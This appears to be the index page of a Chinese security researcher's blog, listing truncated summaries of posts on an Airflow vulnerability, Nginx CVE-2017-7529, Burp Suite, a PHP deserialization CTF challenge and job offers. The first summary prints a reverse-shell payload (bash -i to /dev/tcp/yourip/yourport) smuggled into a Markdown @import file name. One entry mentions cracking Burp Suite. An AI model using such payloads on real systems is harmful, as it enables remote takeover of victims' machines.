sherlson

摘要： @import "$(bash -c 'bash -i >*& /dev/tcp/yourip/yourport 0>&1'| exit 0) Python.pdf" The following comment will be recognised by MPE as valid "@import" 阅读全文

摘要： 偶尔在启动IDEA或PyCharm时，会遇到java.net.BindException: Address already in use: bind错误而无法启动。 解决办法 方式一： 重启电脑 可能会遇到多次重启电脑仍出现无法启动的情况，但是，一般绝对可行 方式二： 很多情况下，我们已经开启了很多 阅读全文

摘要： 前提说明：该姿势并无安全问题，短密码生成的前提是知道原密码（即文中的长密码） 前景提要 Positive Technologies 的网络安全研究员 Arseniy Sharoglazov 近日在社交平台分享了一个简单的实验并指出，加密的 ZIP 文件可能存在两个正确的密码，并且都可以提取出相同的结 阅读全文

摘要： 1. 漏洞环境 fofa key: title="Airflow - DAGs" || body="Apache Airflow" 采用本地搭建漏洞测试环境 # 获取yaml文档 curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2. 阅读全文

摘要： 本文转载于[Burp Suite完整教程] Intruder Attack type和Payloads – 拥有上千种姿态的攻击模式 转载本文的原因是，在实战过程中，利用Burp Suite同时探测内网C段和端口的姿势不够熟悉，转载了一篇比较完善的文章，用于自己学习，顺便记录一下。 今天要介绍Int 阅读全文

摘要： 0x00、发现问题 重装Burp Suite时发现，使用burploader.jar进行注册破解，突然发现无法打开jar文件。 0x01、排查环境变量 首先排查JDK的环境变量，查看JAVA_HOME、CLASSPATH、PATH中的环境变量： JAVA_HOME: E:\openJDK\jdk11 阅读全文

摘要： CVE-2017-7529 本文首发于freebuf Nginx安全性分析 影响版本：0.5.6-1.13.2 漏洞危害：敏感信息泄露 HTTP-Range HTTP的Range 允许客户端分批次请求资源的一部分，如果服务端资源较大，可以通过Range来并发下载;如果访问资源时网络中断，可以断点续传 阅读全文

摘要： 题目给定了以下源码： <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function _ 阅读全文

摘要： 一些常用的沙箱检测 微步沙盒: https://s.threatbook.cn/ 腾讯哈勃分析系统: https://habo.qq.com/ ==》要md5，GG！！！还是算了，不太友好！！！ 魔盾: https://www.maldun.com/analysis/ 微点沙盒: https://s 阅读全文

摘要： 目前4个offer了，说明一下状况： 安恒信息 杭州 安恒云部门 安恒信息 北京 安全服务部门 奇安信 重庆 安全服务部门 中安网星 北京 安全部门 由于疫情因素，个人不是很想去北京，不过中安网星可以远程，还给配电脑，因为不是很了解中安网星，所以还是去安恒信息了。 阅读全文